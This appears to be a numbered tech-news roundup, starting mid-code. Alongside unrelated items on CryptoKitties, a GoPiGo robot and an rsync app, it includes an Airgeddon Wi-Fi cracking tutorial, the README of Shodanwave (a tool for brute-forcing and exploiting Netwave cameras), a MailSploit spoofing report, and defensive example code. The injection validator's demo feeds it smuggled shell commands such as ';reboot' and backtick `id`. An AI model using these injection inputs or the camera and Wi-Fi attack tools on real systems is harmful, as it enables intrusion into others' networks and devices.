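    """Allow-list check: accept only an IP literal or an RFC 1123 hostname.

    Anything else (backticks, $(...), ;, |, ${IFS}, spaces) is rejected
    without ever being handed to a shell, so no blocklist of metacharacters
    is needed.
    """
    if not arg or len(arg) > 253:
        return False
    try:
        ipaddress.ip_address(arg)  # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    labels = arg.rstrip('.').split('.')
    return all(_LABEL_RE.match(label) for label in labels)


def build_traceroute_argv(command_line: str):
    """Parse a hypothetical 'lan traceroute <target>' console line.

    Returns an argv list meant for subprocess.run(argv) with shell=False,
    or None if the line is not exactly the expected shape. Building argv
    instead of concatenating a command string is what removes the injection.
    """
    tokens = command_line.strip().split()
    if len(tokens) != 3 or tokens[0] != 'lan' or tokens[1] != 'traceroute':
        return None
    target = tokens[2]
    if not is_valid_traceroute_target(target):
        return None
    return ['traceroute', target]


if __name__ == "__main__":
    # Constructed console lines, benign and hostile, to show the decision.
    for line in [
        "lan traceroute 192.0.2.10",
        "lan traceroute host-1.example.com",
        "lan traceroute 2001:db8::1",
        "lan traceroute `id`",
        "lan traceroute 192.0.2.10;reboot",
        "lan traceroute `openssl${IFS}s_client`",
    ]:
        print(f"{line!r:50} -> {build_traceroute_argv(line)}")
```

The validator never tries to enumerate dangerous characters; it only recognises the two shapes a traceroute target can legitimately have, which is the property the original dev command lacked.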
  19. A new craze for virtual kittens is slowing down trade in one of the largest crypto-currencies. CryptoKitties lets players buy and breed "crypto-pets" on Ethereum's underlying blockchain network. The game's developers told the Bloomberg news agency that CryptoKitties was a "key step" to making blockchains more accessible. But its popularity has underscored one of the technology's biggest downsides: its lack of scalability. Etherscan has reported a sixfold increase in pending transactions on Ethereum since the game's release, by the Axiom Zen innovation studio, on 28 November. "CryptoKitties has become so popular that it's taking up a significant amount of available space for transactions on the Ethereum platform," said Garrick Hileman, from the Cambridge Centre for Alternative Finance. "Some people are concerned that a frivolous game is now going to be crowding out more serious, significant-seeming business uses." An estimated $4.5m (£3.35m) has been spent on the cartoon cats at the time of writing, according to Crypto Kitty Sales.
[Image: CryptoKitties is the first game built on Ethereum]
What is a CryptoKitty?
Think of these rather unpalatable cartoon kittens as unique digital Pokemon cards. The game's developers describe them as "breedable Beanie Babies", each with its own unique 256-bit genome. These crypto-collectibles are also gender-fluid, able to play the role of either the "dame" or the "sire" when bred together. The kitties' unique DNA can lead to four billion possible genetic variations. Some of the varieties created so far look lifelike, with grey striped fur and bulging green eyes. Others are speckled with neon-blue spots or magenta-patterned swirls.
[Image: One of the less attractive CryptoKitties]
How much are CryptoKitties worth?
At the time of writing, the median, or mid-range, price of a CryptoKitty is approximately $23.06 (£17.19), according to Crypto Kitty Sales. The game's top cat brought in $117,712.12 (£87,686.11) when it sold on Saturday, 2 December.
How can I pay for my own litter?
CryptoKitties can be bought using only Ether, a crypto-currency that acts as the fuel of the Ethereum blockchain network. To get started, users must install a Chrome extension called MetaMask, which acts as a digital wallet and lets players send and receive Ether from their computers. Ether must be purchased from a crypto-currency exchange before it can be added to MetaMask.
[Image: The sale page for a CryptoKitty]
Where do the CryptoKitties come from?
Axiom Zen releases a new CryptoKitty every 15 minutes, but the rest of the supply is powered by the breeding of existing crypto-pets. Owners of kittens can put them up for sale and set their own price in ethers.
Why does it matter if CryptoKitties is slowing down Ethereum?
According to ETH Gas Station, the CryptoKitties game accounts for over 10% of network traffic on Ethereum. As traffic increases, transactions become more expensive to execute quickly. "The real big issue is other major players looking for alternatives to Ethereum and moving to different systems," Mr Hileman said. "There's definitely an urgency for Ethereum to try and address this issue."
Via bbc.com
  20. A weak password is one that is short, common, or easy to guess. Equally bad are secure but reused passwords that have been lost by negligent third-party companies like Equifax and Yahoo. Today, we will use Airgeddon, a wireless auditing framework, to show how anyone can crack bad passwords for WPA and WPA2 wireless networks in minutes or seconds with only a computer and network adapter. To follow this guide, you'll need a wireless network adapter capable of monitor mode and packet injection. You will also need a computer capable of running VirtualBox, an open-source hypervisor, software that can create and run multiple virtual machines. This should be easy since VirtualBox has downloads for Windows, macOS, and Linux. You can also download a copy of Parrot Security OS (aka ParrotSec) to run in VirtualBox if you'd like everything to work like in our video guide below. If you want to download the ParrotSec ISO but you'd also like to stay off any NSA lists, you can always use a proxy server to download the image file while hiding your IP address. If you're already set up on Arch or Kali Linux, you can also install Airgeddon and any dependencies following the directions on GitHub, and then follow along. One thing to note: Airgeddon needs to open other windows to work, so this won't work via SSH (Secure Shell), only VNC (Virtual Networking Computer) or with a screen. As you can see in the video above, a WPA handshake can be grabbed in seconds, leaving the strength of your password as your last line of defense. If this can't stand up to a reasonable assault, your data is as good as gone if an attacker decides to knock on the door of your network. If you're looking for some help, there are plenty of ways to prevent yourself from being easy to attack with this method. Never reuse passwords, and always make sure to use secure passwords hackers won't like. 
Password managers like LastPass also allow you to create and sync secure passwords that are much harder to brute-force. Lastly, never share your Wi-Fi password when you don't need to, and change it regularly if you have to share your password at all. Thanks for watching, please subscribe to Null Byte on YouTube for more content, and happy cracking!
Source: https://null-byte.wonderhowto.com/how-to/video-crack-weak-wi-fi-passwords-seconds-with-airgeddon-parrot-os-0181434/
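The post's closing point is that once a WPA handshake has been captured, the passphrase is the only thing left standing, and "short, common, or easy to guess" is what offline cracking feeds on. The following is an added example, not Null Byte's or Airgeddon's code, of how a defender can audit a candidate WPA2-PSK passphrase and generate a strong one with the OS CSPRNG. The small common-password set is a constructed stand-in for a real wordlist, and the default guess rate in expected_crack_seconds is an assumed illustrative figure, not a measurement.

```python
import math
import secrets
import string

# Constructed stand-in for a real leaked-password list; an actual audit
# would load something like rockyou.txt here instead.
COMMON_PASSPHRASES = {
    "password", "12345678", "qwertyuiop", "iloveyou", "letmein123",
    "sunshine1", "football1", "princess1",
}

# WPA/WPA2-Personal passphrases are 8 to 63 printable ASCII characters
# (IEEE 802.11i); anything outside that range is not a valid PSK passphrase.
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63


def charset_size(passphrase: str) -> int:
    """Size of the smallest obvious alphabet that contains every character."""
    size = 0
    if any(c.islower() for c in passphrase):
        size += 26
    if any(c.isupper() for c in passphrase):
        size += 26
    if any(c.isdigit() for c in passphrase):
        size += 10
    if any(c in string.punctuation or c == ' ' for c in passphrase):
        size += len(string.punctuation) + 1  # 33 printable symbols incl. space
    return size


def estimate_entropy_bits(passphrase: str) -> float:
    """Upper-bound entropy assuming uniformly random picks from the alphabet.

    Passphrases built from words or keyboard patterns are far weaker than
    this number suggests, which is why the dictionary check runs as well.
    """
    if not passphrase:
        return 0.0
    return len(passphrase) * math.log2(charset_size(passphrase))


def assess_wpa_passphrase(passphrase: str):
    """Return (verdict, entropy_bits, reasons) for a WPA2-PSK candidate."""
    reasons = []
    if not WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN:
        reasons.append(f"length must be {WPA_MIN_LEN}-{WPA_MAX_LEN} characters")
    if passphrase.lower() in COMMON_PASSPHRASES:
        reasons.append("found in common-password list")
    if len(passphrase) < 12:
        reasons.append("shorter than 12 characters")
    bits = estimate_entropy_bits(passphrase)
    if bits < 60:
        reasons.append(f"estimated entropy {bits:.0f} bits is below 60")
    verdict = "weak" if reasons else "strong"
    return verdict, bits, reasons


def expected_crack_seconds(bits: float, guesses_per_second: float = 1_000_000) -> float:
    """Expected time to hit a uniformly random passphrase (half the keyspace)
    at a given guess rate. The default rate is an assumed, illustrative
    figure for offline PBKDF2 guessing, not a measured one."""
    return 2 ** (bits - 1) / guesses_per_second


def generate_wpa_passphrase(length: int = 20) -> str:
    """Random WPA2 passphrase from the printable-ASCII alphabet, drawn from
    the OS CSPRNG via the secrets module (never random.random())."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return ''.join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    # Constructed candidates to show the verdicts.
    for pw in ["password", "Tr0ub4dor&3", "correct-horse-battery-staple-42",
               generate_wpa_passphrase()]:
        verdict, bits, reasons = assess_wpa_passphrase(pw)
        print(f"{pw!r}: {verdict}, ~{bits:.0f} bits, {reasons}")
```

The entropy figure is deliberately an upper bound: the dictionary check, not the arithmetic, is what catches a passphrase like "password" that a wordlist attack finds on the first pass.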
  21. Shodanwave
Shodanwave is a tool for exploring and obtaining information from cameras, specifically the Netwave IP Camera. The tool uses a search engine called Shodan that makes it easy to search for cameras online.
What does the tool do? Look, a list!
- Search
- Brute force
- SSID and WPAPSK Password Disclosure
- E-mail, FTP, DNS, MSN Password Disclosure
- Exploit
This is an example of Shodanwave running: the password was not found through brute force, so the tool tries to leak the camera's memory. If the tool finds the password, it does not try to leak the memory.
Demo
https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1
How to use?
To use Shodanwave you need an API key, which you can get for free at https://www.shodan.io/; then follow the next steps.
Installation
$ cd /opt/
$ git clone https://github.com/fbctf/shodanwave.git
$ cd shodanwave
$ pip install -r requirements.txt
Usage
Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT
python shodanwave.py --help
This tool is successfully connected to shodan service
Information the use of this tool is illegal, not bad.
usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS]
optional arguments:
  -h, --help                        show this help message and exit
  -s SEARCH, --search SEARCH        Default Netwave IP Camera
  -u USERNAME, --username USERNAME  Select your usernames wordlist
  -w PASSWORD, --wordlist PASSWORD  Select your passwords wordlist
  -k ADDRESS, --shodan ADDRESS      Shodan API key
  -l LIMIT, --limit LIMIT           Limit the number of registers responsed by Shodan
  -o OFFSET, --offset OFFSET        Shodan skips this number of registers from response
  -t OUTPUT, --output OUTPUT        Save the results
Attention
Use this tool wisely and not for evil.
To get the best performance of this tool you need to pay for Shodan to get full API access. Options --limit and --offset may need a paying API key and consume query credits from your Shodan account.
Disclaimer
Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.
Download: sodanwave-master.zip
git clone https://github.com/evilsocketbr/shodanwave.git
Source: https://github.com/evilsocketbr/shodanwave
  22. If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system. A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails, bypassing anti-spoofing mechanisms. Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others. Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse the "From" header. Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with a forged sender address to trick recipients into believing they are receiving that email from a specific person. On a dedicated website that went up today, Haddouche explained how the lack of input sanitization in vulnerable email clients could lead to an email spoofing attack, without actually exploiting any flaw in DMARC. To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to the President of the United States. "Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post. "We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms."
Besides spoofing, the researcher found that some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stem from the email spoofing issue. Haddouche reported this spoofing bug to 33 different client applications, 8 of which had already patched the issue in their products before the public disclosure and 12 of which are on their way to fixing it. Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to the MailSploit attack. However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while the remaining 12 vendors have not yet commented on the researcher's report. Via thehackernews.com
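The flaw described above is in the decoding step: the raw "From" header looks like plain ASCII, and only after RFC 2047 encoded-words are decoded do the smuggled control characters and the second address appear. A client or mail gateway therefore has to run its sanity checks on the decoded value. The following is an added example of such a check, not the researcher's or any vendor's code; it uses only the Python standard library's email.header, and the three sample headers are constructed for the demonstration.

```python
import re
from email.header import decode_header

# C0 control characters plus DEL; none of these belong in a display name.
CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')
# Something address-shaped hiding inside the display-name part.
ADDRESS_LIKE = re.compile(r'[^\s<>@"]+@[^\s<>@"]+')

# Constructed sample headers (not real mail):
BENIGN_PLAIN = '"Alice Example" <alice@example.org>'
BENIGN_ENCODED = '=?utf-8?Q?Alice_Example?= <alice@example.org>'
# Q-encoded display name that decodes to an '@'-containing string followed
# by a NUL byte, in front of the real angle-addr.
SUSPICIOUS = '=?utf-8?Q?alice=40example.org=00?= <mallory@example.net>'


def decode_from_header(raw: str) -> str:
    """Decode RFC 2047 encoded-words (=?charset?Q?..?= or ?B?) into one str.

    The checks must run on this value, not on the raw header, because the
    raw header is where the control characters are still invisible.
    """
    parts = []
    for chunk, charset in decode_header(raw):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or 'ascii', errors='replace')
        parts.append(chunk)
    return ''.join(parts)


def analyze_from_header(raw: str) -> dict:
    """Return the decoded value, a list of findings and a suspicious flag."""
    decoded = decode_from_header(raw)
    findings = []
    if CONTROL_CHARS.search(decoded):
        findings.append('control characters in decoded From header')
    # Split "display name <addr>"; a bare address without brackets has no
    # display name and is left alone here.
    m = re.match(r'\s*(?P<name>.*?)\s*<(?P<addr>[^<>]*)>\s*$', decoded, re.S)
    if m and ADDRESS_LIKE.search(m.group('name')):
        findings.append('display name contains an address-like string')
    return {'decoded': decoded, 'findings': findings, 'suspicious': bool(findings)}


if __name__ == "__main__":
    for hdr in (BENIGN_PLAIN, BENIGN_ENCODED, SUSPICIOUS):
        result = analyze_from_header(hdr)
        print(f"{hdr!r}\n  -> {result['decoded']!r}\n  -> {result['findings']}")
```

Rejecting or rendering such a header with the control characters made visible is the sanitization step the affected clients lacked; DKIM and DMARC never see the display name, so they cannot catch this.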
  23. In this advanced project with the GoPiGo3 we build a browser video streaming robot, which streams live video to a browser and can be controlled from the browser. In this project we use the Raspberry Pi Camera module with the GoPiGo3. You can control the robot using a controller in the browser as the live video streams directly to the browser. The video quality is very good and the latency of the video is low, making this ideal for live video streaming robot projects.
Hardware Needed
- A fully assembled GoPiGo3
- A Raspberry Pi
- A Raspberry Pi Camera Module
Connecting the Camera module
Attach the Raspberry Pi camera module to the port on the Raspberry Pi. For more details on how to attach the camera, see our tutorial here.
Setting up the GoPiGo Video Streaming Robot
You should have cloned the GoPiGo3 GitHub code onto your Raspberry Pi. Install the Pi Camera dependencies and Flask by running the install.sh script:
sudo bash install.sh
Reboot your Pi.
Setup to Run on Boot
You can run the server on boot so you don’t have to run it manually. Use the command install_startup.sh and this should start the Flask server on boot. You should be able to connect to the robot using “http://dex.local:5000” or, if using the Cinch setup, you can use “”. You can set up Cinch, which will automatically set up a Wi-Fi access point, with the command
sudo bash /home/pi/di_update/Raspbian_For_Robots/upd_script/wifi/cinch_setup.sh
On reboot, connect to the WiFi service “Dex”.
Running the Project
Start the server by typing the following command:
sudo python3 flask_server.py
It’s going to take a couple of seconds for the server to fire up. A port and address will be shown there. By default, the port is set to 5000. If you have Raspbian For Robots installed, then going to the http://dex.local:5000 address will be enough. Be sure you have your mobile device / laptop on the same network as your GoPiGo3. Otherwise, you won’t be able to access it.
Source: https://www.dexterindustries.com/GoPiGo/projects/python-examples-for-the-raspberry-pi/browser-video-streaming-robot-gopigo3/
  24. Still using FTP? Truck hauls data 30x faster thanks to its modern rsync engine (included) which compresses, de-duplicates and encrypts – giving significantly higher performance and security, right from the first transfer. Setup takes 3 clicks (no command line), then just drag-and-drop to transfer. Unlock the performance of rsync with the simplicity of Truck.
Benchmarks
– 18x faster – uploading a new installation of WordPress.
– 30x faster – downloading a used instance of WordPress.
– 12x faster – sending an app to another computer in the office.
No data was pre-existing at the destination; these were all first-time transfers – all gains are thanks to rsync’s compression and de-duplication. Comparisons were made versus the fastest FTP and SFTP apps for Mac, and native SMB sharing.
Features
– Upload and download via rsync by dragging-and-dropping.
– Browse, rename, copy, move and delete remote files very quickly and easily.
– Works over a securely encrypted SSH tunnel (no setup required).
– Includes rsync 3.1.2 (no command-line interaction required).
– Connects to any remote machine.
– Checkboxes to quickly enable rsync’s most powerful features – such as backups/version-controlling, bandwidth-management, retention of partial transfers, etc.
– Push-update the remote system’s version of rsync (includes precompiled binaries to suit a variety of remote machines).
– Advanced GUI controls to selectively tune over 125 other rsync options. Even application-defined defaults can be overridden for a near-command-line level of control.
– Autocompletion and inline documentation provided for each option.
– Specify when the option applies (e.g. when uploading/downloading/both).
– Enable ‘scavenging’: a preference to boost transfers by systematically employing rsync’s –copy-dest option; essentially reusing data from existing files in recently-visited directories. Fuzzy matching means that even files that are non-identical can be used as a basis for boosting.
– Filter rules to include/exclude items based on text matching (or advanced pattern matching).
– Toggle visibility of hidden files.
– Specify ‘initial paths’ – for connecting straight into the given directory.
– Fine tune custom preferences for each direction (upload/download) for each server.
– Save multiple Favourites and work with multiple servers in multiple windows.
– Bonjour browsing to easily connect to servers found nearby.
– Use your SSH RSA private key instead of a password to connect to AWS, Google Cloud, etc.
– An ‘Open Terminal Here’ action to quickly jump into an SSH session in Terminal.app – pre-authenticated and ready in the right directory.
– Detailed operation logging.
– Filter any view of files and use the keyboard to navigate.
Certified for use with:
– Google Cloud.
– Amazon AWS.
– Dreamhost.
– (And works with any other service provider offering standard rsync-over-SSH.)
Other features in the pipe:
– Native rsync protocol support (in addition to the current rsync-over-ssh).
– Scheduled transfers.
– A ‘get info’ panel with full support for ownership and permissions management.
– A history panel with granular operation logging.
System Requirements
Compatible with:
– Mac OS X 10.8 (Mountain Lion and Mountain Lion Server)
– Mac OS X 10.9 (Mavericks and Mavericks Server)
– Mac OS X 10.10 (Yosemite and Yosemite Server)
– Mac OS X 10.11 (El Capitan and El Capitan Server)
– macOS 10.12 (Sierra and Sierra Server)
– macOS 10.13 (High Sierra and High Sierra Server)
The remote machine must have a running SSH service and carry its own copy of rsync. Macs have this as standard. Therefore, to connect to a remote Mac, simply enable ‘Remote Login’ in its System Preferences.
Download Click here to download (21MB) – free trial included. Source: http://bonhardcomputing.com/truck/#2017-12-04
  25. Black Friday